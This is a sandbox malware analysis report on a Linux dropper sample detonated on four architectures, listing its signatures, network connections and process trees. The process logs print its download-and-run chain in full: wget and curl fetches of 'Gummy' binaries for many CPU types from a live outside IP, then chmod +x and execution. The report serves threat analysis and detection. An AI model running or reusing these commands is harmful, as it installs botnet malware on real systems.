Malware Analysis Report

2025-01-23 15:15

Sample ID 240823-3a2zhsvdnj
Target bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118
SHA256 714d4cbbefe02a253c95ec26c8aa552bb48de01a9604086a61a1db89a3722bd6
Tags
antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

714d4cbbefe02a253c95ec26c8aa552bb48de01a9604086a61a1db89a3722bd6

Threat Level: Shows suspicious behavior

The file bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-23 23:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-23 23:19

Reported

2024-08-23 23:22

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

60s

Max time network

132s

Command Line

[/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/SSH /tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 N/A

Processes

/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118

[/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.x86]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.x86]

/bin/cat

[cat Gummy.x86]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-CEV6jt]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.mips]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.mips]

/bin/cat

[cat Gummy.mips]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-CEV6jt]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.mpsl]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.mpsl]

/bin/cat

[cat Gummy.mpsl]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-CEV6jt]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.arm4]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.arm4]

/bin/cat

[cat Gummy.arm4]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-CEV6jt]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.arm5]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.arm5]

/bin/cat

[cat Gummy.arm5]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-CEV6jt]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.arm6]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.arm6]

/bin/cat

[cat Gummy.arm6]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.arm7]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.arm7]

/bin/cat

[cat Gummy.arm7]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.ppc]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.ppc]

/bin/cat

[cat Gummy.ppc]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.m68k]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.m68k]

/bin/cat

[cat Gummy.m68k]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.sh4]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.sh4]

/bin/cat

[cat Gummy.sh4]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0]

/tmp/SSH

[./SSH Gummy-SSH]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.15:443 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-23 23:19

Reported

2024-08-23 23:22

Platform

debian9-armhf-20240611-en

Max time kernel

63s

Max time network

67s

Command Line

[/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/SSH /tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 N/A

Processes

/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118

[/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.x86]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.x86]

/bin/cat

[cat Gummy.x86]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-8ac9b20eda93434480f68b279ed4afad-systemd-timedated.service-FfZxiF]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.mips]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.mips]

/bin/cat

[cat Gummy.mips]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-8ac9b20eda93434480f68b279ed4afad-systemd-timedated.service-FfZxiF]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.mpsl]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.mpsl]

/bin/cat

[cat Gummy.mpsl]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-8ac9b20eda93434480f68b279ed4afad-systemd-timedated.service-FfZxiF]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.arm4]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.arm4]

/bin/cat

[cat Gummy.arm4]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-8ac9b20eda93434480f68b279ed4afad-systemd-timedated.service-FfZxiF]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.arm5]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.arm5]

/bin/cat

[cat Gummy.arm5]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.arm6]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.arm6]

/bin/cat

[cat Gummy.arm6]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.arm7]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.arm7]

/bin/cat

[cat Gummy.arm7]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.ppc]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.ppc]

/bin/cat

[cat Gummy.ppc]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.m68k]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.m68k]

/bin/cat

[cat Gummy.m68k]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.sh4]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.sh4]

/bin/cat

[cat Gummy.sh4]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]

/tmp/SSH

[./SSH Gummy-SSH]

Network

Country Destination Domain Proto
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp

Files

memory/776-1-0xb673d000-0xb674e044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-23 23:19

Reported

2024-08-23 23:22

Platform

debian9-mipsbe-20240611-en

Max time kernel

78s

Max time network

83s

Command Line

[/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/SSH /tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 N/A

Processes

/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118

[/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.x86]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.x86]

/bin/cat

[cat Gummy.x86]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-skqFsz]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.mips]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.mips]

/bin/cat

[cat Gummy.mips]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-skqFsz]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.mpsl]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.mpsl]

/bin/cat

[cat Gummy.mpsl]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.arm4]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.arm4]

/bin/cat

[cat Gummy.arm4]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.arm5]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.arm5]

/bin/cat

[cat Gummy.arm5]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.arm6]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.arm6]

/bin/cat

[cat Gummy.arm6]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.arm7]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.arm7]

/bin/cat

[cat Gummy.arm7]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.ppc]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.ppc]

/bin/cat

[cat Gummy.ppc]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.m68k]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.m68k]

/bin/cat

[cat Gummy.m68k]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.sh4]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.sh4]

/bin/cat

[cat Gummy.sh4]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]

/tmp/SSH

[./SSH Gummy-SSH]

Network

Country Destination Domain Proto
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-23 23:19

Reported

2024-08-23 23:22

Platform

debian9-mipsel-20240611-en

Max time kernel

62s

Max time network

65s

Command Line

[/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A
N/A /tmp/SSH /tmp/SSH N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/SSH /tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 N/A

Processes

/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118

[/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.x86]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.x86]

/bin/cat

[cat Gummy.x86]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-mkf0kl]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.mips]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.mips]

/bin/cat

[cat Gummy.mips]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-mkf0kl]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.mpsl]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.mpsl]

/bin/cat

[cat Gummy.mpsl]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-mkf0kl]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.arm4]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.arm4]

/bin/cat

[cat Gummy.arm4]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-mkf0kl]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.arm5]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.arm5]

/bin/cat

[cat Gummy.arm5]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.arm6]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.arm6]

/bin/cat

[cat Gummy.arm6]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.arm7]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.arm7]

/bin/cat

[cat Gummy.arm7]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.ppc]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.ppc]

/bin/cat

[cat Gummy.ppc]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]

/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.m68k]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.m68k]

/bin/cat

[cat Gummy.m68k]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]

